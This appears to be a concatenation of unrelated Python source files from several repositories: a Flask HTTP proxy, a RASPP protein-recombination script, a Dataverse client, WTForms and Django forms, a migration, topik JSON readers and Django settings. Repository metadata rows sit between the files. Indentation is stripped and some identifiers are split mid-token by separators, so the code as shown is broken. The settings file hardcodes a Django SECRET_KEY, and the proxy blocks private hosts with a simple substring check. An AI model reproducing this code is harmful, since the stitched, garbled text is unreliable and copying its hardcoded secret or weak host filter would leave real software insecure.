SRC_RELATIVE_REGEXP = re.compile(r"""(<\s*(?!ng-[^<>]*)[^<>]*\s(src|href)\s*=\s*"?'?)(?!http://|https://|//|/|#|"|"#|'|'#| i)""")
SRC_ABSOLUTE_REGEXP = re.compile(r"""(<\s*(?!ng-[^<>]*)[^<>]*\s(src|href)\s*=\s*"?'?)(?!http://|https://|//|#|"|"#|'|'#| i)""")
URL_ABSOLUTE_REGEXP = re.compile(r"""([: ]url\()/""")
def inject_absolute_urls(output, url):
#
# e.g., /bar/foo.html contains
# /bar/scripts/script.js which references to "image/foo.jpg'
#
# Then, we actually want /bar/image/foo.jpg and not /bar/scripts/image/foo.jpg
#
if url.endswith('.js') and request.referrer:
base_url = extract_base_url(request.referrer)
else:
base_url = extract_base_url(url)
absolute_url = 'http://{}'.format(urlparse.urlparse(url).netloc)
scheme = 'https' if current_app.config.get('PROXY_HTTPS') else 'http'
absolute_proxied_url = url_for('.proxy', url=absolute_url, _external=True, _scheme=scheme)
relative_proxied_url = url_for('.proxy', url=base_url, _external=True, _scheme=scheme)
output_lines = output.split('\n')
for line in output_lines:
line =
|
SRC_RELATIVE_REGEXP.sub(r"\1%s" % relative_proxied_url, line)
line = SRC_ABSOLUTE_REGEXP.sub(r"\1%s" % absolute_proxied_url, line)
if '.css' in url:
line = URL_ABSOLUTE_REGEXP.sub(r"\1%s/" % absolute_proxied_url, line)
output = '\n'.join(output_lines)
return output
def replace_links(block, url):
|
block = inject_absolute_urls(block, url)
return block
def generate(req, url):
pending_data = ""
for chunk in req.iter_content(chunk_size=1024):
current_block = pending_data + chunk
unfinished = False
for unfinished_regexp in unfinished_regexps:
if unfinished_regexp.match(current_block):
unfinished = True
if unfinished:
pending_data = current_block
continue
# It is finished. Replace all
current_block = replace_links(current_block, url)
yield current_block
pending_data = ""
ALLOWED_HOSTS = None
ALLOWED_HOSTS_LAST_UPDATE = 0 # Epoch
def get_allowed_hosts():
global ALLOWED_HOSTS
global ALLOWED_HOSTS_LAST_UPDATE
EXPIRATION = 60 # 1 minute
if time.time() - ALLOWED_HOSTS_LAST_UPDATE < EXPIRATION: # Less than a minute? Check
return ALLOWED_HOSTS
# Check list of allowed hosts
allowed_hosts = [ ah.url for ah in db.session.query(AllowedHost).all() ]
allowed_hosts = [ allowed_host for allowed_host in allowed_hosts if 'localhost' not in allowed_host and '127.0.' not in allowed_host and '192.168' not in allowed_host and '::1' not in allowed_host ]
ALLOWED_HOSTS = allowed_hosts
return ALLOWED_HOSTS
@proxy_blueprint.route('/<path:url>')
def proxy(url):
if not url.startswith('http://'):
return "Invalid protocol. Only http is supported -no https-.", 400
parsed = urlparse.urlparse(url)
if parsed.path == '':
url = url + '/'
allow_all = current_app.config.get('ALLOWED_HOSTS_ALL', False)
if not allow_all:
if parsed.netloc not in get_allowed_hosts():
return "URL domain not in the white list", abort(403)
request_headers = {}
for header in request.headers.keys():
if header in WHITELIST_REQUEST_HEADERS:
request_headers[header] = request.headers[header]
query_url = url
query_args = urlparse.urlparse(request.url).query
if query_args:
query_url = query_url + '?' + query_args
req = requests.get(query_url, stream = True, headers=request_headers)
content_type = req.headers.get('content-type')
if content_type:
kwargs = dict(content_type=content_type)
else:
kwargs = {}
response = Response(stream_with_context(generate(req, url)), status=req.status_code, **kwargs)
for header in WHITELIST_RESPONSE_HEADERS:
if header in req.headers.keys():
header_value = req.headers[header]
if header.lower() == 'location':
if header_value.startswith('/'):
scheme = 'https' if current_app.config.get('PROXY_HTTPS') else 'http'
header_value = url_for('.proxy', url='http://{}'.format(parsed.netloc), _external=True, _scheme=scheme) + header_value
response.headers[header] = header_value
for cookie in iter(req.cookies):
kwargs = {}
path = url_for('.proxy', url='http://{}'.format(parsed.netloc)) + cookie.path
if cookie.expires:
kwargs['expires'] = cookie.expires
response.set_cookie(key=cookie.name, value=cookie.value, path=path, **kwargs)
return response
@proxy_blueprint.route('/allowed-hosts/', methods=['GET', 'POST'])
def allowed_hosts():
if request.method == 'POST':
data = request.get_json(force=True, silent=True)
if request.headers.get('gw4labs-auth') != current_app.config.get('ALLOWED_HOSTS_CREDENTIAL', object()):
return "Invalid gw4labs-auth credentials", 403
# Valid app
valid_hosts = data['hosts']
valid_hosts = [ valid_host for valid_host in valid_hosts if valid_host and 'localhost' not in valid_host and '127.0.' not in valid_host and '192.168' not in valid_host and '::1' not in valid_host ]
processed_hosts = []
for ah in db.session.query(AllowedHost).all():
if ah.url in valid_hosts:
ah.update()
else:
db.session.delete(ah)
processed_hosts.append(ah.url)
for missing_host in set(valid_hosts).difference(set(processed_hosts)):
ah = AllowedHost(missing_host)
db.session.add(ah)
db.session.commit()
all_hosts = [ {
'url': ah.url,
'when': ah.last_update.strftime("%Y-%m-%d %H:%M:%S")
} for ah in db.session.query(AllowedHost).all() ]
return jsonify(hosts=all_hosts)
|
mattasmith/SCHEMA-RASPP
|
rasppcurve.py
|
Python
|
gpl-3.0
| 7,335
| 0.022904
|
#! /usr/local/bin/python
"""Script for producing a RASPP curve: the average disruption (energy)
and average mutation of libraries that have the lowest average energy
given constraints on fragment length.
******************************************************************
Copyright (C) 2005 Allan Drummond, California Institute of Technology
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*******************************************************************
SCHEMA and RASPP were developed in the laboratory of Frances H. Arnold at the California Institute of Technology.
References:
Voigt, C. et al., "Protein building blocks preserved by recombination," Nature Structural Biology 9(7):553-558 (2002).
Meyer, M. et al., "Library analysis of SCHEMA-guided recombination," Protein Science 12:1686-1693 (2003).
Otey, C. et al., "Functional evolution and structural conservation in chimeric cytochromes P450: Calibrating a structure-guided approach," Chemistry & Biology 11:1-20 (2004)
Silberg, J. et al., "SCHEMA-guided protein recombination," Methods in Enzymology 388:35-42 (2004).
Endelman, J. et al., "Site-directed protein recombination as a shortest-path problem," Protein Engineering, Design & Selection 17(7):589-594 (2005).
"""
import sys, os, string, math, random, time
import pdb, schema, raspp
ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE = 'msa'
ARG_CONTACT_FILE = 'con'
ARG_OUTPUT_FILE = 'o'
ARG_MIN_FRAGMENT_SIZE = 'min'
ARG_NUM_LIBRARIES = 'libs'
ARG_MAX_CHIMERAS_PER_LIBRARY = 'chims'
ARG_BIN_WIDTH = "bin"
ARG_NUM_CROSSOVERS = 'xo'
ARG_RANDOM_SEED = 'seed'
ARG_COMPARE = 'compare' # Unused
ARG_HELP = 'help'
def parse_arguments(args):
# Turn linear arguments into a dictionary of (option, [values,...]) pairs
arg_dict = {}
key = None
for arg in args[1:]:
if arg[0] == '-':
key = arg[1:]
else:
if arg_dict.has_key(key):
if arg_dict[key] is list:
arg_dict[key] = arg_dict[key]+[arg]
else:
arg_dict[key] = [arg_dict[key],arg]
else:
arg_dict[key] = arg
return arg_dict
def print_usage(args):
print 'Usage: python', args[0].split(os.path.sep)[-1], " [options]"
print "Options:\n", \
'\t-%s <alignment file>\n' % ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE, \
"\t-%s <contact file>\n" % ARG_CONTACT_FILE, \
'\t-%s <# crossovers>\n' % ARG_NUM_CROSSOVERS, \
'\t[-%s <# libraries to generate>]\n' % ARG_NUM_LIBRARIES, \
'\t[-%s <random number seed>]\n' % ARG_RANDOM_SEED, \
'\t[-%s <max. chimeras generated per library>]\n' % ARG_MAX_CHIMERAS_PER_LIBRARY, \
'\t[-%s <min. fragment length>]\n' % ARG_MIN_FRAGMENT_SIZE, \
'\t[-%s <bin width>]\n' % ARG_BIN_WIDTH, \
'\t[-%s <output file>]' % ARG_OUTPUT_FILE
def confirm_arguments(arg_dict):
# Are arguments okay?
res = True
arg_keys = arg_dict.keys()
try:
if len(arg_keys) == 0:
res = False
return
if not ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE in arg_keys:
print " You must provide a library file (-%s <alignment file>)" % ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE
res = False
elif not os.path.isfile(arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]):
print " Can't find library file %s" % arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]
res = False
if not ARG_CONTACT_FILE in arg_keys:
print " You must provide a contact file (-%s <contact file>)" % ARG_CONTACT_FILE
res = False
elif not os.path.isfile(arg_dict[ARG_CONTACT_FILE]):
print " Can't find contact file %s" % arg_dict[ARG_CONTACT_FILE]
res = False
if not ARG_NUM_CROSSOVERS in arg_keys:
print " You must specify the number of crossovers (-%s <number of crossovers>)" % ARG_NUM_CROSSOVERS
res = False
except Exception, e:
#print e
res = False
return res
def main(args):
arg_dict = parse_arguments(args)
if not confirm_arguments(arg_dict):
if args[0].split(os.path.sep)[-1] == "rasppcurve.py":
print_usage(args)
return
# Flags and values
print_E = False
print_m = False
# Inputs:
# The alignment/fragment file name.
msa_file = arg_dict[ARG_MULTIPLE_SEQUENCE_ALIGNMENT_FILE]
# Read the alignment file to create a list of parents.
# The parents will appear in the list in the order in which they appear in the file.
parent_list = schema.readMultipleSequenceAlignmentFile(file(msa_file, 'r'))
parents = [p for (k,p) in parent_list]
# Get the contacts
pdb_contacts = schema.readContactFile(file(arg_dict[ARG_CONTACT_FILE], 'r'))
# Establish connection to output, either file or, if no output file is
# specified, to standard output.
if arg_dict.has_key(ARG_OUTPUT_FILE):
output_file = file(arg_dict[ARG_OUTPUT_FILE], 'w')
else:
output_file = sys.stdout
# Get the minimum fragment size.
if arg_dict.has_key(ARG_MIN_FRAGMENT_SIZE):
min_length = int(arg_dict[ARG_MIN_FRAGMENT_SIZE])
else:
output_file.write("# No minimum fragment length specified; using L=4.\n")
min_length = 4
# Get the bin width
if arg_dict.has_key(ARG_BIN_WIDTH):
bin_width = float(arg_dict[ARG_BIN_WIDTH])
else:
output_file.write("# No bin width specified; using bin width=1.0.\n")
bin_width = 1.0
# Get the number of fragments -- one more than the number of crossovers.
num_fragments = int(arg_dict[ARG_NUM_CROSSOVERS])+1
num_parents = len(parents)
library_size = num_parents**num_fragments
# Make libraries consistent with RASPP
(new_parents, identical_sites) = raspp.collapse_parents(parents)
if len(new_parents[0]) < num_fragments*min_length:
error_msg = "Minimum fragment length of %d is too large.\n%d " + \
"fragments with length %d cannot be found in a " + \
|
"sequence of length %d (with identities removed). Aborting..."
print error_msg % (min_length, num_fragments, min_length, len(parents[0]))
return
contacts = schema.getSCHEMAContacts(pdb_contacts, parents)
energies = raspp.make_4d_energies(contacts, parents)
avg_energies = raspp.calc_average_energies(energies, parents)
tstart = time.clock()
res = raspp.RASPP(avg_energies, parents, num_fragments-1, min_length)
output_file.write("# RASPP took
|
%1.2f secs\n" % (time.clock()-tstart,))
output_file.write("# RASPP found %d results\n" % (len(res),))
tstart = time.clock()
curve = raspp.curve(res, parents, bin_width)
output_file.write("# RASPP found %d unique (<E>,<m>) points\n" % (len(curve),))
output_file.write("# RASPP curve took %1.2f secs\n" % (time.clock()-tstart,))
output_file.write("# <E>\t<m>\tcrossover points\n")
for (average_E, average_m, crossovers) in curve:
xover_pat = '%d '*len(crossovers)
xover_str = xover_pat % tuple(crossovers)
output_file.write('%1.4f\t%1.4f\t%s\n' % (average_E, average_m, xover_str))
if arg_dict.has_key(ARG_OUTPUT_FILE):
output_file.close()
def main_wrapper():
main(sys.argv)
main_wrapper()
|
aaxelb/osf.io
|
addons/dataverse/client.py
|
Python
|
apache-2.0
| 3,545
| 0.001975
|
import httplib as http
from dataverse import Connection
from dataverse.exceptions import ConnectionError, UnauthorizedError, OperationFailedError
from framework.exceptions import HTTPError
from addons.dataverse import settings
from website.util.sanitize import strip_html
def _connect(host, token):
try:
return Connection(host, token)
except ConnectionError:
return None
def connect_from_settings(node_settings):
if not (node_settings and node_settings.external_account):
return None
host = node_settings.external_account.oauth_key
token = node_settings.external_account.oauth_secret
try:
return _connect(host, token)
except UnauthorizedError:
return None
def connect_or_error(host, token):
try:
connection = _connect(host, token)
if not connection:
raise HTTPError(http.SERVICE_UNAVAILABLE)
return connection
except UnauthorizedError:
raise HTTPError(http.UNAUTHORIZED)
def connect_from_settings_or_401(node_settings):
if not (node_settings and node_settings.external_account):
return None
host = node_settings.external_account.oauth_key
token = node_settings.external_account.oauth_secret
return connect_or_error(host, token)
def get_files(dataset, published=False):
version = 'latest-published' if published else 'latest'
return dataset.get_files(version)
def publish_dataverse(dataverse):
try:
dataverse.publish()
except OperationFailedError:
raise HTTPError(http.BAD_REQUEST)
def publish_dataset(dataset):
if dataset.get_state() == 'RELEASED':
raise HTTPError(http.CONFLICT, data=dict(
message_short='Dataset conflict',
message_long='This version of the dataset has already been published.'
))
if not dataset.dataverse.is_published:
raise HTTPError(http.METHOD_NOT_ALLOWED, data=dict(
message_short='Method not allowed',
message_long='A dataset cannot be published until its parent Dataverse is published.'
))
try:
dataset.publish()
except OperationFailedError:
raise HTTPError(http.BAD_REQUEST)
def get_datasets(dataverse):
if dataverse is None:
return []
return dataverse.get_datasets(timeout=settings.REQUEST_TIMEOUT)
def get_dataset(dataverse, doi):
if dataverse is None:
return
dataset = dataverse.get_dataset_by_doi(doi, timeout=settings.REQUEST_TIMEOUT)
try:
if dataset and dataset.get_state() == 'DEACCESSIONED':
raise HTTPError(http.GONE, data=dict(
message_short='Dataset deaccessioned',
message_long='This dataset has been deaccessioned and can no longer be linked to the OSF.'
))
return dataset
except UnicodeDecodeError:
raise HTTPError(http.NOT_ACCEPTABLE, data=dict(
message_short='Not acceptable',
messag
|
e_long='This dataset cannot be connected due to forbidden '
'characters in one or more of the file names.'
))
def get_dataverses(connection):
if connection is None:
return []
return connection.get_dataverses()
def get_dataverse(connection, alias):
if connection is None:
return
return connection.get_dataverse(alias)
def ge
|
t_custom_publish_text(connection):
if connection is None:
return ''
return strip_html(connection.get_custom_publish_text(), tags=['strong', 'li', 'ul'])
|
sahilshekhawat/ApkDecompiler
|
javadecompiler/Krakatau/ssa/excepttypes.py
|
Python
|
gpl-2.0
| 368
| 0.005435
|
#common exception types
ArrayOOB = 'java/lang/ArrayIndexOutOfBoundsException', 0
ArrayStore = 'java/lang/ArrayStoreException', 0
ClassCast = 'java/lang/ClassCastException', 0
MonState = 'java/lang/IllegalMonitorStateException', 0
NegArrSize = 'java/lang/NegativeArraySizeException', 0
NullPtr = 'java/lang/Nu
|
llPointerException', 0
|
OOM = 'java/lang/OutOfMemoryError', 0
|
thoas/django-fairepart
|
fairepart/forms.py
|
Python
|
mit
| 787
| 0.002541
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import Invitation
class InvitationForm(forms.ModelForm):
class Meta:
model = Invitation
fields = ('email', 'text')
def __init__(self, *args,
|
**kwargs):
self.user = kwargs.pop('user', None)
super(InvitationForm, self).__init__(*args, **kwargs)
def clean_email(self):
email = self.cleaned_data['email']
if Invitation.objects.filter(from_user=self.user, email=email).exists():
raise forms.ValidationError(_('An invitation for %s already exist') % email)
|
return email
def save(self, *args, **kwargs):
self.instance.from_user = self.user
super(InvitationForm, self).save(*args, **kwargs)
|
roninio/gae-boilerplate
|
boilerplate/forms.py
|
Python
|
lgpl-3.0
| 5,505
| 0.00545
|
"""
Created on June 10, 2012
@author: peta15
"""
from wtforms import fields
from wtforms import Form
from wtforms import validators
from lib import utils
from webapp2_extras.i18n import lazy_gettext as _
from webapp2_extras.i18n import ngettext, gettext
FIELD_MAXLENGTH = 50 # intended to stop maliciously long input
class FormTranslations(object):
def gettext(self, string):
return gettext(string)
def ngettext(self, singular, plural, n):
return ngettext(singular, plural, n)
class BaseForm(Form):
def __init__(self, request_handler):
super(BaseForm, self).__init__(request_handler.request.POST)
def _get_translations(self):
return FormTranslations()
# ==== Mixins ====
class PasswordConfirmMixin(BaseForm):
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
c_password = fields.TextField(_('Confirm Password'),
[validators.Required(), validators.EqualTo('password', _('Passwords must match.')),
validators.Length(max=FIELD_MAXLENGTH,
message=_("Field cannot be longer than %(max)d characters."))])
class UsernameMixin(BaseForm):
username = fields.TextField(_('Username'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.EMAIL_REGEXP, message=_(
"Username / Email invalid."))])
class NameMixin(BaseForm):
name = fields.TextField(_('Name'), [
validators.Length(max=FIELD_MAXLENGTH, message=_("Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Name invalid. Use only letters and numbers."))])
last_name = fields.TextField(_('Last Name'), [
validators.Length(max=FIELD_MAXLENGTH, message=_("Field cannot be longer than %(max)d characters.")),
|
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Last Name invalid. Use only letters and numbers."))])
class EmailMixin(BaseForm):
email = fields.TextField(_('Email'), [validators.Required(),
validators.Length(min=8, max=FIELD_MAXLENGTH, message=_(
|
"Field must be between %(min)d and %(max)d characters long.")),
validators.regexp(utils.EMAIL_REGEXP, message=_('Invalid email address.'))])
# ==== Forms ====
class PasswordResetCompleteForm(PasswordConfirmMixin):
pass
class LoginForm(UsernameMixin):
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))],
id='l_password')
pass
class ContactForm(EmailMixin):
name = fields.TextField(_('Name'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters.")),
validators.regexp(utils.NAME_LASTNAME_REGEXP, message=_(
"Name invalid. Use only letters and numbers."))])
message = fields.TextAreaField(_('Message'), [validators.Required(), validators.Length(max=65536)])
pass
class RegisterForm(PasswordConfirmMixin, UsernameMixin, NameMixin, EmailMixin):
country = fields.SelectField(_('Country'), choices=[])
tz = fields.SelectField(_('Timezone'), choices=[])
pass
class EditProfileForm(UsernameMixin, NameMixin):
country = fields.SelectField(_('Country'), choices=[])
tz = fields.SelectField(_('Timezone'), choices=[])
pass
class EditPasswordForm(PasswordConfirmMixin):
current_password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
pass
class EditEmailForm(BaseForm):
new_email = fields.TextField(_('Email'), [validators.Required(),
validators.Length(min=8, max=FIELD_MAXLENGTH, message=_(
"Field must be between %(min)d and %(max)d characters long.")),
validators.regexp(utils.EMAIL_REGEXP,
message=_('Invalid email address.'))])
password = fields.TextField(_('Password'), [validators.Required(),
validators.Length(max=FIELD_MAXLENGTH, message=_(
"Field cannot be longer than %(max)d characters."))])
pass
|
biddellns/litsl
|
season/migrations/0004_groupround_schedule_is_set.py
|
Python
|
gpl-3.0
| 464
| 0
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-06 02:31
from __future__ import unicode_
|
literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('season', '0003_auto_20161206_0216'),
]
operations = [
migrations.AddField(
model_name='groupround',
|
name='schedule_is_set',
field=models.BooleanField(default=False),
),
]
|
kcompher/topik
|
topik/readers.py
|
Python
|
bsd-3-clause
| 15,758
| 0.004823
|
from __future__ import absolute_import, print_function
import os
import logging
from topik.intermediaries.raw_data import output_formats
# imports used only for doctests
from topik.tests import test_data_path
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO)
def _iter_document_json_stream(filename, json_prefix=None):
"""Iterate over a json stream of items and get the field that contains the text to process and tokenize.
Parameters
----------
filename: string
The filename of the json stream.
>>> documents = _iter_document_json_stream(
... '{}/test_data_json_stream.json'.format(test_data_path))
>>> next(documents) == {
... u'doi': u'http://dx.doi.org/10.1557/PROC-879-Z3.3',
... u'title': u'Sol Gel Preparation of Ta2O5 Nanorods Using DNA as Structure Directing Agent',
... u'url': u'http://journals.cambridge.org/action/displayAbstract?fromPage=online&aid=8081671&fulltextType=RA&fileId=S1946427400119281.html',
... u'abstract': u'Transition metal oxides are being considered as the next generation materials in field such as electronics and advanced catalysts; between them is Tantalum (V) Oxide; however, there are few reports for the synthesis of this material at the nanometer size which could have unusual properties. Hence, in this work we present the synthesis of Ta2O5 nanorods by sol gel method using DNA as structure directing agent, the size of the nanorods was of the order of 40 to 100 nm in diameter and several microns in length; this easy method can be useful in the preparation of nanomaterials for electronics, biomedical applications as well as catalysts.',
... u'filepath': u'abstracts/879/http%3A%2F%2Fjournals.cambridge.org%2Faction%2FdisplayAbstract%3FfromPage%3Donline%26aid%3D8081671%26fulltextType%3DRA%26fileId%3DS1946427400119281.html',
... u'filename': '{}/test_data_json_stream.json'.format(test_data_path),
... u'vol': u'879',
... u'authors': [u'Humberto A. Monreala', u' Alberto M. Villafa\xf1e',
... u' Jos\xe9 G. Chac\xf3n', u' Perla E. Garc\xeda',
... u'Carlos A. Mart\xednez'],
... u'year': u'1917'}
True
"""
import json
with open(filename, 'r') as f:
for n, line in enumerate(f):
try:
output = json.loads(line)
output["filename"] = filename
yield output
except ValueError as e:
logging.debug("Unable to process line: {} (error was: {})".format(str(line), e))
raise
def __is_iterable(obj):
try:
iter(obj)
except TypeError, te:
return False
return True
def _test_json_input(fi
|
lename):
return next(_iter_document_json_stream(filename))
def _iter_large_json(filename, json_prefix='item'):
# TODO: add the script to automatically find the json_prefix based on a key
# Also should still have the option to manually specify a prefix for complex
# json structures.
"""Iterate over all items and sub-items in a json object that match the specified
|
prefix
Parameters
----------
filename: string
The filename of the large json file
json_prefix: string
The string representation of the hierarchical prefix where the items of
interest may be located within the larger json object.
Try the following script if you need help determining the desired prefix:
$ import ijson
$ with open('test_data_large_json_2.json', 'r') as f:
$ parser = ijson.parse(f)
$ for prefix, event, value in parser:
$ print("prefix = '%r' || event = '%r' || value = '%r'" %
$ (prefix, event, value))
>>> documents = _iter_large_json(
... '{}/test_data_large_json.json'.format(test_data_path),
... json_prefix='item._source.isAuthorOf')
>>> next(documents) == {
... u'a': u'ScholarlyArticle',
... u'name': u'Path planning and formation control via potential function for UAV Quadrotor',
... u'author': [
... u'http://dig.isi.edu/autonomy/data/author/a.a.a.rizqi',
... u'http://dig.isi.edu/autonomy/data/author/t.b.adji',
... u'http://dig.isi.edu/autonomy/data/author/a.i.cahyadi'],
... u'text': u"Potential-function-based control strategy for path planning and formation " +
... u"control of Quadrotors is proposed in this work. The potential function is " +
... u"used to attract the Quadrotor to the goal location as well as avoiding the " +
... u"obstacle. The algorithm to solve the so called local minima problem by utilizing " +
... u"the wall-following behavior is also explained. The resulted path planning via " +
... u"potential function strategy is then used to design formation control algorithm. " +
... u"Using the hybrid virtual leader and behavioral approach schema, the formation " +
... u"control strategy by means of potential function is proposed. The overall strategy " +
... u"has been successfully applied to the Quadrotor's model of Parrot AR Drone 2.0 in " +
... u"Gazebo simulator programmed using Robot Operating System.\\nAuthor(s) Rizqi, A.A.A. " +
... u"Dept. of Electr. Eng. & Inf. Technol., Univ. Gadjah Mada, Yogyakarta, Indonesia " +
... u"Cahyadi, A.I. ; Adji, T.B.\\nReferenced Items are not available for this document.\\n" +
... u"No versions found for this document.\\nStandards Dictionary Terms are available to " +
... u"subscribers only.",
... u'uri': u'http://dig.isi.edu/autonomy/data/article/6871517',
... u'datePublished': u'2014',
... 'filename': '{}/test_data_large_json.json'.format(test_data_path)}
True
"""
from ijson import items
with open(filename, 'r') as f:
for item in items(f, json_prefix):
if hasattr(item, 'keys'): # check if item is a dictionary
item['filename'] = filename
yield item
# check if item is both iterable and not a string
elif __is_iterable(item) and not isinstance(item, str):
for sub_item in item:
# check if sub_item is a dictionary
if hasattr(sub_item, 'keys'):
sub_item['filename'] = filename
yield sub_item
else:
raise ValueError("'item' in json source is not a dict, and is either a string or not iterable: %r" % item)
def _iter_documents_folder(folder, content_field='text'):
"""Iterate over the files in a folder to retrieve the content to process and tokenize.
Parameters
----------
folder: string
The folder containing the files you want to analyze.
content_field: string
The usage of 'content_field' in this source is different from most other sources. The
assumption in this source is that each file contains raw text, NOT dictionaries of
categorized data. The content_field argument here specifies what key to store the raw
text under in the returned dictionary for each document.
$ ls ./topik/tests/data/test_data_folder_files
doc1 doc2 doc3
>>> documents = _iter_documents_folder(
... '{}/test_data_folder_files'.format(test_data_path))
>>> next(documents)['text'] == (
... u"'Interstellar' was incredible. The visuals, the score, " +
... u"the acting, were all amazing. The plot is definitely one " +
... u"of the most original I've seen in a while.")
True
"""
import gzip
if not os.path.exists(folder):
raise IOError("Folder not found!")
for directory, subdirectories, files in os.walk(folder):
for n, file in enumerate(sorted(files)):
_open = gzip.open if file.endswith('.gz') else open
try:
fullpath = os.path.join(directory, file)
with _open(fullpath, 'rb') as f:
yield {content_field: f.read(
|
shaunsephton/holodeck
|
holodeck/django_settings.py
|
Python
|
bsd-3-clause
| 5,258
| 0.000761
|
from holodeck.settings import *
import os
import sys
# Django settings for Holodeck project.
PATH = os.path.split(os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]))))[0]
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(PATH, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PATH, 'static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/st
|
atic" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.sta
|
ticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'nj1p6t#2(fe(e=e_96o05fhti6p#@^mwaqioq=(f(ma_unqvt='
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages"
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'holodeck.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'holodeck.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'holodeck',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
jarble/EngScript
|
libraries/polishNotation.py
|
Python
|
mit
| 14,320
| 0.023673
|
#The new version is in polishNotation2.py. Use that version instead of using this version.
#To do:
#Find out how to split a string using matches of a regular expression as the separator.
#Test everything in polyglotCodeGenerator.py
#Use re.match(expr, stringToSplit).groups() to split a string with its parameters:
#http://stackoverflow.com/questions/18903923/how-to-split-a-string-in-python-without-redundant-output
